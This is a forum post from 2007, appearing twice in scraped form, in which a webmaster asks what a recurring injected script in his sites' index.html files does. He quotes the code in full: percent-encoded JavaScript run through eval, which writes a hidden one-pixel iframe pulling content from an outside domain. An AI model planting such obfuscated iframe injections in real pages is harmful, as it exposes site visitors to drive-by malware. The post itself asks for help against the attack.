GoFuckYourself.com - Adult Webmaster Forum - View Single Post - What is this malicious injected code all about?

d-null · 11-21-2007, 09:15 AM

I've seen this a few times in the last couple months. What does this code do that someone is injecting into the index.html code for many sites? I've cleaned it out before only to have it return again a month later. Why and how are they injecting this code?

this is what it looks like, and it seemed to try to run outlook express on one site, the other nothing seemed to happen:

<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e %77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%7 2%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79% 64%65%6c%65%74%65%2e%63%6f%6d%2f%73%74%72%6f%6e%67 %2f%30%35%30%2f%20%77%69%64%74%68%3d%31%20%68%65%6 9%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27% 29%3b'));</script>

11-21-2007, 09:15 AM
d-null . . . Industry Role: Join Date: Apr 2007 Location: NY Posts: 13,724	What is this malicious injected code all about? I've seen this a few times in the last couple months. What does this code do that someone is injecting into the index.html code for many sites? I've cleaned it out before only to have it return again a month later. Why and how are they injecting this code? this is what it looks like, and it seemed to try to run outlook express on one site, the other nothing seemed to happen: <script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e %77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%7 2%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79% 64%65%6c%65%74%65%2e%63%6f%6d%2f%73%74%72%6f%6e%67 %2f%30%35%30%2f%20%77%69%64%74%68%3d%31%20%68%65%6 9%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27% 29%3b'));</script>